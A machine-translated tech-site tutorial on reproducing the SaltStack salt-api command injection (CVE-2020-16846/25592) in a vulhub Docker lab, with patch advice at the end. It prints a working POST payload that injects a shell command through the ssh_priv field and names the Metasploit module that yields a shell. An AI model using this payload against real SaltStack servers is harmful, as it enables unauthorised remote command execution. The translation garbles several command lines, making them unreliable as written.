Shulou(Shulou.com)05/31 Report--

What this article shares with you is about how to reproduce SaltStack command injection loopholes. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article.

Introduction to 0x00

SaltStack is a centralized management platform for server infrastructure, with configuration management, remote execution, monitoring and other functions, based on Python language, combined with lightweight message queuing (ZeroMQ) and Python third-party modules (Pyzmq, PyCrypto, Pyjinjia2, python-msgpack and PyYAML, etc.). By deploying SaltStack, we can execute commands in batches on tens of millions of servers, configure centralized management, distribute files, collect server data, operating system foundation and software package management according to different services.

Overview of 0x01 vulnerabilities

A combination of CVE-2020-16846 and CVE-2020-25592 can execute arbitrary commands through the salt-api interface without authorization. CVE-2020-25592 allows any user to call the SSH module, and CVE-2020-16846 allows the user to execute arbitrary commands.

0x02 affects version

SaltStack 2015/2016/2017/2018/2019/3000/3001/3002

0x03 environment building

1. It is complicated to build this vulnerability manually. Use the docker environment in vulhub to build and download it and decompress it.

Wget https://github.com/vulhub/vulhub/archive/master.zip-O vulhub-master.zipunzip vulhub-master.zip

2. Enter the vulnerability directory and use docker-compose to start the vulnerability environment. If you see a green done, the startup is successful.

Cd vulhub/saltstack/CVE-2020-16846/docker-compose up-d

3. Access https://your-ip:8000 in the browser. This is the API port of Salt. Note: https access is required

Recurrence of 0x04 vulnerabilities

1. Visit the following link in url, use burp to grab the packet and send it to the playback module

Https://your-ip:8000/run

2. Modify get to post transmission, construct the following data packet to write to the file, and click send.

Token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa | touch%20/tmp/success%3b

3. Return 200ok and go to the docker container to check whether the file has been written successfully.

4. Use exp in msf to exploit vulnerabilities, launch msf, select attack module, configure information, execute with run or exploit, and get shell after execution.

Msfconsoleuse exploit/linux/http/saltstack_salt_api_cmd_execshow options

0x05 repair recommendation

1. It is recommended to download and install this vulnerability patch at the official download address:

Https://gitlab.com/saltstack/open/salt-patches

2. Upgrade to the secure version and download it at:

Https://repo.saltstack.com/

The above is how to reproduce the SaltStack command injection loophole. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.